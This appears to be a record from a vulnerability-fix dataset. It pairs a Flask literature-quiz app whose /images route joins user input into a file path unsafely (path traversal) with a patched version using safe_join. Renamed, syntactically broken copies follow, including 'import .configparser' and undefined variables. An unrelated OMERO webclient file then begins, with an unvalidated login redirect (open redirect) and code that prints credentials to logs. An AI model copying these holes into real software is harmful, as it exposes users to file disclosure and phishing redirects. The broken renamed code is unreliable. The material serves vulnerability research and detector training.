config.read('config.ini')
pg_db_username = config['DEFAULT']['LOCAL_DB_USERNAME']
pg_db_password = config['DEFAULT']['LOCAL_DB_PASSWORD']
pg_db_name = config['DEFAULT']['LOCAL_DB_NAME']
pg_db_hostname = config['DEFAULT']['LOCAL_DB_HOSTNAME']
app.config["SQLALCHEMY_DATABASE_URI"] = "postgresql://{DB_USER}:{DB_PASS}@{DB_ADDR}/{DB_NAME}".format(
DB_USER=pg_db_username,
DB_PASS=pg_db_password,
DB_ADDR=pg_db_hostname,
DB_NAME=pg_db_name)
app.config["SECRET_KEY"] = config['DEFAULT']['SECRET_KEY']
credentials = ServiceAccountCredentials.from_json_keyfile_name(config['DEFAULT']['GOOGLE_CREDENTIALS_PATH'], scope)
else:
app.config["SQLALCHEMY_DATABASE_URI"] = os.environ.get('DATABASE_URL', None)
app.config["SECRET_KEY"] = os.environ.get('SECRET_KEY', None)
print(os.environ.get('GOOGLE_CREDENTIALS', None))
print(json.loads(os.environ.get('GOOGLE_CREDENTIALS', None)))
credentials = ServiceAccountCredentials.from_json_keyfile_dict(json.loads(os.environ.get('GOOGLE_CREDENTIALS', None)), scope)
update()
@app.route('/')
def index():
munhak_rows = copy.deepcopy(munhak_rows_data)
data = {
"total_munhak" : len(munhak_rows),
"source_list" : sorted(set([munhak_row.source for munhak_row in munhak_rows]))
}
print(data)
session["quiz_count"] = 0
return render_template("quiz/index.html", data=data)
@app.route("/get-quiz")
def get_quiz():
if "quiz_count" not in session:
session["quiz_count"] = 0
session["total_munhak"] = len(munhak_rows_data)
if "solved_quiz" not in session:
session["solved_quiz"] = []
session["result"] = None
quiz_no = session["quiz_count"] + 1
solved_quiz = session["solved_quiz"]
if "current_munhak" not in session or session["current_munhak"] is None:
# munhak_rows = Munhak.query.filter_by(is_available=True).all()
munhak_rows = copy.deepcopy(munhak_rows_data)
not_solved_munhak_rows = [munhak_row for munhak_row in munhak_rows if munhak_row.munhak_seq not in solved_quiz]
if len(not_solved_munhak_rows) == 0:
session["result"] = True
return redirect(url_for("result"))
correct_munhak_row = random.choice(not_solved_munhak_rows)
for _ in [munhak_row for munhak_row in munhak_rows if munhak_row.title == correct_munhak_row.title]:
munhak_rows.remove(_)
random.shuffle(munhak_rows)
option_munhak_rows = munhak_rows[0:3] + [correct_munhak_row]
random.shuffle(option_munhak_rows)
correct = option_munhak_rows.index(correct_munhak_row)
print(correct)
# correct = random.randrange(0, 4)
#
# answer_row = not_solved_munhak_rows[correct]
#
session["correct"] = correct
hint = random.choice(correct_munhak_row.keywords)
hint = hint.replace("\\", "")
session["current_munhak"] = {
"munhak_seq": correct_munhak_row.munhak_seq,
"source": correct_munhak_row.source,
"category": correct_munhak_row.category,
"hint": hint,
"title": correct_munhak_row.title,
"writer": correct_munhak_row.writer
}
session["options"] = [munhak_row._asdict() for munhak_row in option_munhak_rows]
data = {
"quiz_no": quiz_no,
"type": "객관식",
"category": correct_munhak_row.category,
"hint": hint,
"options": [
f"{munhak_row.writer}, 『{munhak_row.title}』" for munhak_row in option_munhak_rows
],
"total_munhak": len(munhak_rows_data)
}
print(data)
#
return render_template("quiz/quiz.html", data=data)
else:
# print(hint)
data = {
"quiz_no": quiz_no,
"type": "객관식",
"category": session["current_munhak"]["category"],
"hint": session["current_munhak"]["hint"],
"options": [
f"{munhak_row['writer']}, 『{munhak_row['title']}』" for munhak_row in session["options"]
],
"total_munhak": len(munhak_rows_data)
}
print(data)
#
return render_template("quiz/quiz.html", data=data)
@app.route('/quiz')
def quiz():
return render_template("quiz/quiz_container.html")
@app.route("/answer", methods=["GET", "POST"])
def answer():
print(session)
option = request.form.get("option", None)
if option is None or (not type(option) != int):
return abort(400)
option = int(option)
correct = session["correct"]
if correct is None:
return abort(401)
current_munhak = session["current_munhak"]
if current_munhak is None:
return abort(401)
if correct == option:
session["quiz_count"] += 1
session["solved_quiz"].append(current_munhak["munhak_seq"])
session["current_munhak"] = None
# current_munhak = jsonify(current_munhak)
return "success"
else:
if "quiz_count" not in session:
session["quiz_count"] = 0
if "solved_quiz" not in session:
# session["solved_quiz"] = []
session["result"] = False
return "failed", 404
@app.route("/result", methods=["GET", "POST"])
def result():
is_success = session["result"]
data = {
"is_success" : is_success,
"solved_count" : session["quiz_count"],
"correct" : session["correct"],
"current_munhak" : session["current_munhak"]
}
session["quiz_count"] = 0
session["solved_quiz"] = []
session["current_munhak"] = None
print(data)
return render_template("quiz/result.html", data = data)
@app.route('/update')
def update_():
if request.args.get("key", None) != app.config["SECRET_KEY"]:
return "error"
update()
session.clear()
return f"success! {len(munhak_rows_data)}"
@app.route('/images/<path:path>')
def get_image(path):
def get_absolute_path(path):
import os
script_dir = os.path.dirname(__file__) # <-- absolute dir the script is in
rel_path = path
abs_file_path = safe_join(script_dir, rel_path)
return abs_file_path
return send_file(
get_absolute_path(f"./images/{path}"),
mimetype='image/png',
attachment_filename='snapshot.png',
cache_timeout=0
)
if __name__ == '__main__':
app.run()
| path_disclosure | {
"code": [
" abs_file_path = os.path.join(script_dir, rel_path)"
],
"line_no": [
270
]
} | {
"code": [
"from werkzeug.utils import safe_join",
" abs_file_path = safe_join(script_dir, rel_path)"
],
"line_no": [
4,
271
]
} | import .configparser
from flask import Flask, render_template, VAR_17, request, flash, redirect, url_for, Response, abort, jsonify, send_file
import socket
import os
import random
import copy
from flask_sqlalchemy import SQLAlchemy, Model
import gspread
from oauth2client.service_account import ServiceAccountCredentials
import json
import base64
from collections import namedtuple
from VAR_4.common.decorator import return_500_if_errors
VAR_0 = ['https://spreadsheets.google.com/feeds',
'https://www.googleapis.com/auth/drive']
VAR_1 = socket.gethostname()
VAR_2 = None
VAR_3 = None
if VAR_1[:7] == "DESKTOP":
VAR_2 = True
else:
VAR_2 = False
VAR_4 = Flask(__name__)
def FUNC_0():
VAR_6 = gspread.authorize(VAR_14).open("문학따먹기")
VAR_7 = VAR_6.get_worksheet(0)
VAR_8 = VAR_7.get_all_values()
print(VAR_8)
try:
VAR_16 = []
for row in VAR_8[1:]:
VAR_31 = namedtuple("Munhak", VAR_8[0])(*row)
VAR_31 = VAR_31._replace(keywords=json.loads(VAR_31.keywords))
if VAR_31.is_available == "TRUE":
VAR_16.append(VAR_31)
except:
pass
global VAR_3
munhak_rows_data = VAR_16
print(VAR_16)
return
if VAR_2:
VAR_9 = configparser.ConfigParser()
VAR_9.read('config.ini')
VAR_10 = VAR_9['DEFAULT']['LOCAL_DB_USERNAME']
VAR_11 = VAR_9['DEFAULT']['LOCAL_DB_PASSWORD']
VAR_12 = VAR_9['DEFAULT']['LOCAL_DB_NAME']
VAR_13 = VAR_9['DEFAULT']['LOCAL_DB_HOSTNAME']
VAR_4.config["SQLALCHEMY_DATABASE_URI"] = "postgresql://{DB_USER}:{DB_PASS}@{DB_ADDR}/{DB_NAME}".format(
DB_USER=VAR_10,
DB_PASS=VAR_11,
DB_ADDR=VAR_13,
DB_NAME=VAR_12)
VAR_4.config["SECRET_KEY"] = VAR_9['DEFAULT']['SECRET_KEY']
VAR_14 = ServiceAccountCredentials.from_json_keyfile_name(VAR_9['DEFAULT']['GOOGLE_CREDENTIALS_PATH'], VAR_0)
else:
VAR_4.config["SQLALCHEMY_DATABASE_URI"] = os.environ.get('DATABASE_URL', None)
VAR_4.config["SECRET_KEY"] = os.environ.get('SECRET_KEY', None)
print(os.environ.get('GOOGLE_CREDENTIALS', None))
print(json.loads(os.environ.get('GOOGLE_CREDENTIALS', None)))
VAR_14 = ServiceAccountCredentials.from_json_keyfile_dict(json.loads(os.environ.get('GOOGLE_CREDENTIALS', None)), VAR_0)
FUNC_0()
@VAR_4.route('/')
def FUNC_1():
VAR_15 = copy.deepcopy(VAR_3)
VAR_16 = {
"total_munhak" : len(VAR_15),
"source_list" : sorted(set([munhak_row.source for munhak_row in VAR_15]))
}
print(VAR_16)
VAR_17["quiz_count"] = 0
return render_template("quiz/FUNC_1.html", VAR_16=data)
@VAR_4.route("/get-quiz")
def FUNC_2():
if "quiz_count" not in VAR_17:
VAR_17["quiz_count"] = 0
VAR_17["total_munhak"] = len(VAR_3)
if "solved_quiz" not in VAR_17:
VAR_17["solved_quiz"] = []
VAR_17["result"] = None
VAR_18 = VAR_17["quiz_count"] + 1
VAR_19 = VAR_17["solved_quiz"]
if "current_munhak" not in VAR_17 or VAR_17["current_munhak"] is None:
VAR_15 = copy.deepcopy(VAR_3)
VAR_24 = [munhak_row for munhak_row in VAR_15 if munhak_row.munhak_seq not in VAR_19]
if len(VAR_24) == 0:
VAR_17["result"] = True
return redirect(url_for("result"))
VAR_25 = random.choice(VAR_24)
for _ in [munhak_row for munhak_row in VAR_15 if munhak_row.title == VAR_25.title]:
VAR_15.remove(_)
random.shuffle(VAR_15)
VAR_26 = VAR_15[0:3] + [VAR_25]
random.shuffle(VAR_26)
VAR_21 = VAR_26.index(VAR_25)
print(VAR_21)
VAR_17["correct"] = VAR_21
VAR_27 = random.choice(VAR_25.keywords)
VAR_27 = hint.replace("\\", "")
VAR_17["current_munhak"] = {
"munhak_seq": VAR_25.munhak_seq,
"source": VAR_25.source,
"category": VAR_25.category,
"hint": VAR_27,
"title": VAR_25.title,
"writer": VAR_25.writer
}
VAR_17["options"] = [munhak_row._asdict() for munhak_row in VAR_26]
VAR_16 = {
"quiz_no": VAR_18,
"type": "객관식",
"category": VAR_25.category,
"hint": VAR_27,
"options": [
f"{munhak_row.writer}, 『{munhak_row.title}』" for munhak_row in VAR_26
],
"total_munhak": len(VAR_3)
}
print(VAR_16)
return render_template("quiz/FUNC_3.html", VAR_16=data)
else:
VAR_16 = {
"quiz_no": VAR_18,
"type": "객관식",
"category": VAR_17["current_munhak"]["category"],
"hint": VAR_17["current_munhak"]["hint"],
"options": [
f"{munhak_row['writer']}, 『{munhak_row['title']}』" for munhak_row in VAR_17["options"]
],
"total_munhak": len(VAR_3)
}
print(VAR_16)
return render_template("quiz/FUNC_3.html", VAR_16=data)
@VAR_4.route('/quiz')
def FUNC_3():
return render_template("quiz/quiz_container.html")
@VAR_4.route("/answer", methods=["GET", "POST"])
def FUNC_4():
print(VAR_17)
VAR_20 = request.form.get("option", None)
if VAR_20 is None or (not type(VAR_20) != int):
return abort(400)
VAR_20 = int(VAR_20)
VAR_21 = VAR_17["correct"]
if VAR_21 is None:
return abort(401)
VAR_22 = VAR_17["current_munhak"]
if VAR_22 is None:
return abort(401)
if VAR_21 == VAR_20:
VAR_17["quiz_count"] += 1
VAR_17["solved_quiz"].append(VAR_22["munhak_seq"])
VAR_17["current_munhak"] = None
return "success"
else:
if "quiz_count" not in VAR_17:
VAR_17["quiz_count"] = 0
if "solved_quiz" not in VAR_17:
VAR_17["result"] = False
return "failed", 404
@VAR_4.route("/result", methods=["GET", "POST"])
def FUNC_5():
VAR_23 = VAR_17["result"]
VAR_16 = {
"is_success" : VAR_23,
"solved_count" : VAR_17["quiz_count"],
"correct" : VAR_17["correct"],
"current_munhak" : VAR_17["current_munhak"]
}
VAR_17["quiz_count"] = 0
VAR_17["solved_quiz"] = []
VAR_17["current_munhak"] = None
print(VAR_16)
return render_template("quiz/FUNC_5.html", VAR_16 = data)
@VAR_4.route('/update')
def FUNC_6():
if request.args.get("key", None) != VAR_4.config["SECRET_KEY"]:
return "error"
FUNC_0()
VAR_17.clear()
return f"success! {len(VAR_3)}"
@VAR_4.route('/images/<VAR_5:path>')
def FUNC_7(VAR_5):
def FUNC_8(VAR_5):
import os
VAR_28 = os.path.dirname(__file__) # <-- absolute dir the script is in
VAR_29 = VAR_5
VAR_30 = os.path.join(VAR_28, VAR_29)
return VAR_30
return send_file(
FUNC_8(f"./images/{VAR_5}"),
mimetype='image/png',
attachment_filename='snapshot.png',
cache_timeout=0
)
if __name__ == '__main__':
VAR_4.run()
| import .configparser
from flask import Flask, render_template, VAR_17, request, flash, redirect, url_for, Response, abort, jsonify, send_file
from werkzeug.utils import safe_join
import socket
import os
import random
import copy
from flask_sqlalchemy import SQLAlchemy, Model
import gspread
from oauth2client.service_account import ServiceAccountCredentials
import json
import base64
from collections import namedtuple
from VAR_4.common.decorator import return_500_if_errors
VAR_0 = ['https://spreadsheets.google.com/feeds',
'https://www.googleapis.com/auth/drive']
VAR_1 = socket.gethostname()
VAR_2 = None
VAR_3 = None
if VAR_1[:7] == "DESKTOP":
VAR_2 = True
else:
VAR_2 = False
VAR_4 = Flask(__name__)
def FUNC_0():
VAR_6 = gspread.authorize(VAR_14).open("문학따먹기")
VAR_7 = VAR_6.get_worksheet(0)
VAR_8 = VAR_7.get_all_values()
print(VAR_8)
try:
VAR_16 = []
for row in VAR_8[1:]:
VAR_31 = namedtuple("Munhak", VAR_8[0])(*row)
VAR_31 = VAR_31._replace(keywords=json.loads(VAR_31.keywords))
if VAR_31.is_available == "TRUE":
VAR_16.append(VAR_31)
except:
pass
global VAR_3
munhak_rows_data = VAR_16
print(VAR_16)
return
if VAR_2:
VAR_9 = configparser.ConfigParser()
VAR_9.read('config.ini')
VAR_10 = VAR_9['DEFAULT']['LOCAL_DB_USERNAME']
VAR_11 = VAR_9['DEFAULT']['LOCAL_DB_PASSWORD']
VAR_12 = VAR_9['DEFAULT']['LOCAL_DB_NAME']
VAR_13 = VAR_9['DEFAULT']['LOCAL_DB_HOSTNAME']
VAR_4.config["SQLALCHEMY_DATABASE_URI"] = "postgresql://{DB_USER}:{DB_PASS}@{DB_ADDR}/{DB_NAME}".format(
DB_USER=VAR_10,
DB_PASS=VAR_11,
DB_ADDR=VAR_13,
DB_NAME=VAR_12)
VAR_4.config["SECRET_KEY"] = VAR_9['DEFAULT']['SECRET_KEY']
VAR_14 = ServiceAccountCredentials.from_json_keyfile_name(VAR_9['DEFAULT']['GOOGLE_CREDENTIALS_PATH'], VAR_0)
else:
VAR_4.config["SQLALCHEMY_DATABASE_URI"] = os.environ.get('DATABASE_URL', None)
VAR_4.config["SECRET_KEY"] = os.environ.get('SECRET_KEY', None)
print(os.environ.get('GOOGLE_CREDENTIALS', None))
print(json.loads(os.environ.get('GOOGLE_CREDENTIALS', None)))
VAR_14 = ServiceAccountCredentials.from_json_keyfile_dict(json.loads(os.environ.get('GOOGLE_CREDENTIALS', None)), VAR_0)
FUNC_0()
@VAR_4.route('/')
def FUNC_1():
VAR_15 = copy.deepcopy(VAR_3)
VAR_16 = {
"total_munhak" : len(VAR_15),
"source_list" : sorted(set([munhak_row.source for munhak_row in VAR_15]))
}
print(VAR_16)
VAR_17["quiz_count"] = 0
return render_template("quiz/FUNC_1.html", VAR_16=data)
@VAR_4.route("/get-quiz")
def FUNC_2():
if "quiz_count" not in VAR_17:
VAR_17["quiz_count"] = 0
VAR_17["total_munhak"] = len(VAR_3)
if "solved_quiz" not in VAR_17:
VAR_17["solved_quiz"] = []
VAR_17["result"] = None
VAR_18 = VAR_17["quiz_count"] + 1
VAR_19 = VAR_17["solved_quiz"]
if "current_munhak" not in VAR_17 or VAR_17["current_munhak"] is None:
VAR_15 = copy.deepcopy(VAR_3)
VAR_24 = [munhak_row for munhak_row in VAR_15 if munhak_row.munhak_seq not in VAR_19]
if len(VAR_24) == 0:
VAR_17["result"] = True
return redirect(url_for("result"))
VAR_25 = random.choice(VAR_24)
for _ in [munhak_row for munhak_row in VAR_15 if munhak_row.title == VAR_25.title]:
VAR_15.remove(_)
random.shuffle(VAR_15)
VAR_26 = VAR_15[0:3] + [VAR_25]
random.shuffle(VAR_26)
VAR_21 = VAR_26.index(VAR_25)
print(VAR_21)
VAR_17["correct"] = VAR_21
VAR_27 = random.choice(VAR_25.keywords)
VAR_27 = hint.replace("\\", "")
VAR_17["current_munhak"] = {
"munhak_seq": VAR_25.munhak_seq,
"source": VAR_25.source,
"category": VAR_25.category,
"hint": VAR_27,
"title": VAR_25.title,
"writer": VAR_25.writer
}
VAR_17["options"] = [munhak_row._asdict() for munhak_row in VAR_26]
VAR_16 = {
"quiz_no": VAR_18,
"type": "객관식",
"category": VAR_25.category,
"hint": VAR_27,
"options": [
f"{munhak_row.writer}, 『{munhak_row.title}』" for munhak_row in VAR_26
],
"total_munhak": len(VAR_3)
}
print(VAR_16)
return render_template("quiz/FUNC_3.html", VAR_16=data)
else:
VAR_16 = {
"quiz_no": VAR_18,
"type": "객관식",
"category": VAR_17["current_munhak"]["category"],
"hint": VAR_17["current_munhak"]["hint"],
"options": [
f"{munhak_row['writer']}, 『{munhak_row['title']}』" for munhak_row in VAR_17["options"]
],
"total_munhak": len(VAR_3)
}
print(VAR_16)
return render_template("quiz/FUNC_3.html", VAR_16=data)
@VAR_4.route('/quiz')
def FUNC_3():
return render_template("quiz/quiz_container.html")
@VAR_4.route("/answer", methods=["GET", "POST"])
def FUNC_4():
print(VAR_17)
VAR_20 = request.form.get("option", None)
if VAR_20 is None or (not type(VAR_20) != int):
return abort(400)
VAR_20 = int(VAR_20)
VAR_21 = VAR_17["correct"]
if VAR_21 is None:
return abort(401)
VAR_22 = VAR_17["current_munhak"]
if VAR_22 is None:
return abort(401)
if VAR_21 == VAR_20:
VAR_17["quiz_count"] += 1
VAR_17["solved_quiz"].append(VAR_22["munhak_seq"])
VAR_17["current_munhak"] = None
return "success"
else:
if "quiz_count" not in VAR_17:
VAR_17["quiz_count"] = 0
if "solved_quiz" not in VAR_17:
VAR_17["result"] = False
return "failed", 404
@VAR_4.route("/result", methods=["GET", "POST"])
def FUNC_5():
VAR_23 = VAR_17["result"]
VAR_16 = {
"is_success" : VAR_23,
"solved_count" : VAR_17["quiz_count"],
"correct" : VAR_17["correct"],
"current_munhak" : VAR_17["current_munhak"]
}
VAR_17["quiz_count"] = 0
VAR_17["solved_quiz"] = []
VAR_17["current_munhak"] = None
print(VAR_16)
return render_template("quiz/FUNC_5.html", VAR_16 = data)
@VAR_4.route('/update')
def FUNC_6():
if request.args.get("key", None) != VAR_4.config["SECRET_KEY"]:
return "error"
FUNC_0()
VAR_17.clear()
return f"success! {len(VAR_3)}"
@VAR_4.route('/images/<VAR_5:path>')
def FUNC_7(VAR_5):
def FUNC_8(VAR_5):
import os
VAR_28 = os.path.dirname(__file__) # <-- absolute dir the script is in
VAR_29 = VAR_5
VAR_30 = safe_join(VAR_28, VAR_29)
return VAR_30
return send_file(
FUNC_8(f"./images/{VAR_5}"),
mimetype='image/png',
attachment_filename='snapshot.png',
cache_timeout=0
)
if __name__ == '__main__':
VAR_4.run()
| [
2,
14,
16,
19,
22,
24,
29,
31,
32,
34,
36,
38,
42,
49,
50,
53,
57,
59,
60,
61,
65,
70,
76,
78,
80,
82,
88,
89,
90,
92,
93,
94,
103,
106,
107,
116,
119,
121,
122,
124,
126,
130,
132,
135,
137,
139,
143,
144,
145,
146,
147,
149,
152,
173,
176,
188,
190,
191,
192,
196,
197,
208,
212,
217,
220,
224,
226,
228,
229,
230,
233,
234,
236,
237,
247,
250,
251,
253,
255,
258,
262,
263,
272,
279,
280,
282,
284
] | [
2,
15,
17,
20,
23,
25,
30,
32,
33,
35,
37,
39,
43,
50,
51,
54,
58,
60,
61,
62,
66,
71,
77,
79,
81,
83,
89,
90,
91,
93,
94,
95,
104,
107,
108,
117,
120,
122,
123,
125,
127,
131,
133,
136,
138,
140,
144,
145,
146,
147,
148,
150,
153,
174,
177,
189,
191,
192,
193,
197,
198,
209,
213,
218,
221,
225,
227,
229,
230,
231,
234,
235,
237,
238,
248,
251,
252,
254,
256,
259,
263,
264,
273,
280,
281,
283,
285
] |
4CWE-601
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2008-2020 University of Dundee & Open Microscopy Environment.
# All rights reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
""" A view functions is simply a Python function that takes a Web request and
returns a Web response. This response can be the HTML contents of a Web page,
or a redirect, or the 404 and 500 error, or an XML document, or an image...
or anything."""
import copy
import os
import datetime
import Ice
from Ice import Exception as IceException
import logging
import traceback
import json
import re
import sys
import warnings
from past.builtins import unicode
from future.utils import bytes_to_native_str
from time import time
from omeroweb.version import omeroweb_buildyear as build_year
from omeroweb.version import omeroweb_version as omero_version
import omero
import omero.scripts
from omero.rtypes import wrap, unwrap, rlong, rlist
from omero.gateway.utils import toBoolean
from django.conf import settings
from django.template import loader as template_loader
from django.http import (
Http404,
HttpResponse,
HttpResponseRedirect,
JsonResponse,
HttpResponseForbidden,
)
from django.http import HttpResponseServerError, HttpResponseBadRequest
from django.utils.http import urlencode
from django.core.urlresolvers import reverse, NoReverseMatch
from django.utils.encoding import smart_str
from django.views.decorators.cache import never_cache
from django.views.decorators.http import require_POST
from django.shortcuts import render
from omeroweb.webclient.webclient_utils import _formatReport, _purgeCallback
from .forms import GlobalSearchForm, ContainerForm
from .forms import ShareForm, BasketShareForm
from .forms import ContainerNameForm, ContainerDescriptionForm
from .forms import CommentAnnotationForm, TagsAnnotationForm
from .forms import MetadataFilterForm, MetadataDetectorForm
from .forms import MetadataChannelForm, MetadataEnvironmentForm
from .forms import MetadataObjectiveForm, MetadataObjectiveSettingsForm
from .forms import MetadataStageLabelForm, MetadataLightSourceForm
from .forms import MetadataDichroicForm, MetadataMicroscopeForm
from .forms import FilesAnnotationForm, WellIndexForm, NewTagsAnnotationFormSet
from .controller.container import BaseContainer
from .controller.history import BaseCalendar
from .controller.search import BaseSearch
from .controller.share import BaseShare
from omeroweb.webadmin.forms import LoginForm
from omeroweb.webgateway import views as webgateway_views
from omeroweb.webgateway.marshal import graphResponseMarshal
from omeroweb.webgateway.util import get_longs as webgateway_get_longs
from omeroweb.feedback.views import handlerInternalError
from omeroweb.webclient.decorators import login_required
from omeroweb.webclient.decorators import render_response
from omeroweb.webclient.show import (
Show,
IncorrectMenuError,
paths_to_object,
paths_to_tag,
)
from omeroweb.decorators import (
ConnCleaningHttpResponse,
parse_url,
TableClosingHttpResponse,
)
from omeroweb.webgateway.util import getIntOrDefault
from omero.model import (
AnnotationAnnotationLinkI,
DatasetI,
DatasetImageLinkI,
ExperimenterI,
ImageI,
OriginalFileI,
PlateI,
ProjectI,
ProjectDatasetLinkI,
ScreenI,
ScreenPlateLinkI,
TagAnnotationI,
)
from omero import ApiUsageException, ServerError, CmdError
from omeroweb.webgateway.views import LoginView
from . import tree
try:
import long
except ImportError:
long = int
logger = logging.getLogger(__name__)
logger.info("INIT '%s'" % os.getpid())
# We want to allow a higher default limit for annotations so we can load
# all the annotations expected for a PAGE of images
ANNOTATIONS_LIMIT = settings.PAGE * 100
def get_long_or_default(request, name, default):
"""
Retrieves a parameter from the request. If the parameter is not present
the default is returned
This does not catch exceptions as it makes sense to throw exceptions if
the arguments provided do not pass basic type validation
"""
val = None
val_raw = request.GET.get(name, default)
if val_raw is not None:
val = long(val_raw)
return val
def get_list(request, name):
val = request.GET.getlist(name)
return [i for i in val if i != ""]
def get_longs(request, name):
warnings.warn(
"Deprecated. Use omeroweb.webgateway.util.get_longs()", DeprecationWarning
)
return webgateway_get_longs(request, name)
def get_bool_or_default(request, name, default):
"""
Retrieves a parameter from the request. If the parameter is not present
the default is returned
This does not catch exceptions as it makes sense to throw exceptions if
the arguments provided do not pass basic type validation
"""
return toBoolean(request.GET.get(name, default))
##############################################################################
# custom index page
@never_cache
@render_response()
def custom_index(request, conn=None, **kwargs):
context = {"version": omero_version, "build_year": build_year}
if settings.INDEX_TEMPLATE is not None:
try:
template_loader.get_template(settings.INDEX_TEMPLATE)
context["template"] = settings.INDEX_TEMPLATE
except Exception:
context["template"] = "webclient/index.html"
context["error"] = traceback.format_exception(*sys.exc_info())[-1]
else:
context["template"] = "webclient/index.html"
return context
##############################################################################
# views
class WebclientLoginView(LoginView):
"""
Webclient Login - Customises the superclass LoginView
for webclient. Also can be used by other Apps to log in to OMERO. Uses
the 'server' id from request to lookup the server-id (index), host and
port from settings. E.g. "localhost", 4064. Stores these details, along
with username, password etc in the request.session. Resets other data
parameters in the request.session. Tries to get connection to OMERO and
if this works, then we are redirected to the 'index' page or url
specified in REQUEST. If we can't connect, the login page is returned
with appropriate error messages.
"""
template = "webclient/login.html"
useragent = "OMERO.web"
def get(self, request):
"""
GET simply returns the login page
"""
return self.handle_not_logged_in(request)
def handle_logged_in(self, request, conn, connector):
"""
We override this to provide webclient-specific functionality
such as cleaning up any previous sessions (if user didn't logout)
and redirect to specified url or webclient index page.
"""
# webclient has various state that needs cleaning up...
# if 'active_group' remains in session from previous
# login, check it's valid for this user
# NB: we do this for public users in @login_required.get_connection()
if request.session.get("active_group"):
if (
request.session.get("active_group")
not in conn.getEventContext().memberOfGroups
):
del request.session["active_group"]
if request.session.get("user_id"):
# always want to revert to logged-in user
del request.session["user_id"]
if request.session.get("server_settings"):
# always clean when logging in
del request.session["server_settings"]
# do we ned to display server version ?
# server_version = conn.getServerVersion()
if request.POST.get("noredirect"):
return HttpResponse("OK")
url = request.GET.get("url")
if url is None or len(url) == 0:
try:
url = parse_url(settings.LOGIN_REDIRECT)
except Exception:
url = reverse("webindex")
return HttpResponseRedirect(url)
def handle_not_logged_in(self, request, error=None, form=None):
"""
Returns a response for failed login.
Reason for failure may be due to server 'error' or because
of form validation errors.
@param request: http request
@param error: Error message
@param form: Instance of Login Form, populated with data
"""
if form is None:
server_id = request.GET.get("server", request.POST.get("server"))
if server_id is not None:
initial = {"server": unicode(server_id)}
form = LoginForm(initial=initial)
else:
form = LoginForm()
context = {
"version": omero_version,
"build_year": build_year,
"error": error,
"form": form,
}
url = request.GET.get("url")
if url is not None and len(url) != 0:
context["url"] = urlencode({"url": url})
if hasattr(settings, "LOGIN_LOGO"):
context["LOGIN_LOGO"] = settings.LOGIN_LOGO
if settings.PUBLIC_ENABLED:
redirect = reverse("webindex")
if settings.PUBLIC_URL_FILTER.search(redirect):
context["public_enabled"] = True
context["public_login_redirect"] = redirect
context["show_download_links"] = settings.SHOW_CLIENT_DOWNLOADS
if settings.SHOW_CLIENT_DOWNLOADS:
ver = re.match(
(
r"(?P<major>\d+)\."
r"(?P<minor>\d+)\."
r"(?P<patch>\d+\.?)?"
r"(?P<dev>(dev|a|b|rc)\d+)?.*"
),
omero_version,
)
client_download_tag_re = "^v%s\\.%s\\.[^-]+$" % (
ver.group("major"),
ver.group("minor"),
)
context["client_download_tag_re"] = client_download_tag_re
context["client_download_repo"] = settings.CLIENT_DOWNLOAD_GITHUB_REPO
return render(request, self.template, context)
@login_required(ignore_login_fail=True)
def keepalive_ping(request, conn=None, **kwargs):
""" Keeps the OMERO session alive by pinging the server """
# login_required handles ping, timeout etc, so we don't need to do
# anything else
return HttpResponse("OK")
@login_required()
def change_active_group(request, conn=None, url=None, **kwargs):
"""
Simply changes the request.session['active_group'] which is then used by
the @login_required decorator to configure conn for any group-based
queries.
Finally this redirects to the 'url'.
"""
switch_active_group(request)
url = url or reverse("webindex")
return HttpResponseRedirect(url)
def switch_active_group(request, active_group=None):
"""
Simply changes the request.session['active_group'] which is then used by
the @login_required decorator to configure conn for any group-based
queries.
"""
if active_group is None:
active_group = request.GET.get("active_group")
active_group = int(active_group)
if (
"active_group" not in request.session
or active_group != request.session["active_group"]
):
request.session.modified = True
request.session["active_group"] = active_group
def fake_experimenter(request, default_name="All members"):
"""
Marshal faked experimenter when id is -1
Load omero.client.ui.menu.dropdown.everyone.label as username
"""
label = (
request.session.get("server_settings")
.get("ui", {})
.get("menu", {})
.get("dropdown", {})
.get("everyone", {})
.get("label", default_name)
)
return {
"id": -1,
"omeName": label,
"firstName": label,
"lastName": "",
}
@login_required(login_redirect="webindex")
def logout(request, conn=None, **kwargs):
"""
Logout of the session and redirects to the homepage (will redirect to
login first)
"""
if request.method == "POST":
try:
try:
conn.close()
except Exception:
logger.error("Exception during logout.", exc_info=True)
finally:
request.session.flush()
return HttpResponseRedirect(reverse(settings.LOGIN_VIEW))
else:
context = {"url": reverse("weblogout"), "submit": "Do you want to log out?"}
template = "webgateway/base/includes/post_form.html"
return render(request, template, context)
###########################################################################
def _load_template(request, menu, conn=None, url=None, **kwargs):
"""
This view handles most of the top-level pages, as specified by 'menu' E.g.
userdata, usertags, history, search etc.
Query string 'path' that specifies an object to display in the data tree
is parsed.
We also prepare the list of users in the current group, for the
switch-user form. Change-group form is also prepared.
"""
request.session.modified = True
template = kwargs.get("template", None)
if template is None:
if menu == "userdata":
template = "webclient/data/containers.html"
elif menu == "usertags":
template = "webclient/data/containers.html"
else:
# E.g. search/search.html
template = "webclient/%s/%s.html" % (menu, menu)
# tree support
show = kwargs.get("show", Show(conn, request, menu))
# Constructor does no loading. Show.first_selected must be called first
# in order to set up our initial state correctly.
try:
first_sel = show.first_selected
except IncorrectMenuError as e:
return HttpResponseRedirect(e.uri)
# We get the owner of the top level object, E.g. Project
# Actual api_paths_to_object() is retrieved by jsTree once loaded
initially_open_owner = show.initially_open_owner
# If we failed to find 'show'...
if request.GET.get("show", None) is not None and first_sel is None:
# and we're logged in as PUBLIC user...
if (
settings.PUBLIC_ENABLED
and settings.PUBLIC_USER == conn.getUser().getOmeName()
):
# this is likely a regular user who needs to log in as themselves.
# Login then redirect to current url
return HttpResponseRedirect("%s?url=%s" % (reverse("weblogin"), url))
# need to be sure that tree will be correct omero.group
if first_sel is not None:
switch_active_group(request, first_sel.details.group.id.val)
# search support
init = {}
global_search_form = GlobalSearchForm(data=request.GET.copy())
if menu == "search":
if global_search_form.is_valid():
init["query"] = global_search_form.cleaned_data["search_query"]
# get url without request string - used to refresh page after switch
# user/group etc
